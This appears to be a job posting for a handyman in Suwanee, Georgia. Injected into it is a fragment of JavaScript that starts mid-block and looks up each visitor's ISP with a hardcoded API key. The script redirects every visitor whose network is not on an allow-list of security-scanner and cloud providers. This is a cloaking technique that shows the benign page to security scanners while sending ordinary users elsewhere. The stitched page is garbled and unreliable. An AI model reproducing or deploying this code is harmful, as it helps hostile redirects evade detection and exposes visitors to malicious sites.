Handyman / Home Service Technician
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a reliable and skilled Handyman / Home Service Technician to join our team in Suwanee, Georgia. In this role, you will perform a variety of maintenance and repair tasks to ensure customer homes are safe, functional, and well-maintained.
Responsibilities include:
- Conducting general repairs and home maintenance tasks such as plumbing, electrical, carpentry, and drywall repairs
- Inspecting properties to identify issues and recommend solutions
- Completing project work efficiently and to high quality standards
- Communicating clearly with clients about work performed and recommendations
- Maintaining tools and equipment in good working condition
Skills needed:
- Strong problem-solving and troubleshooting abilities
- Excellent time management and organization skills
- Good communication and customer service skills
- Ability to work independently and as part of a team
Benefits include:
- Competitive pay
- Flexible schedule
- Paid training and ongoing professional development
- Opportunities for career growth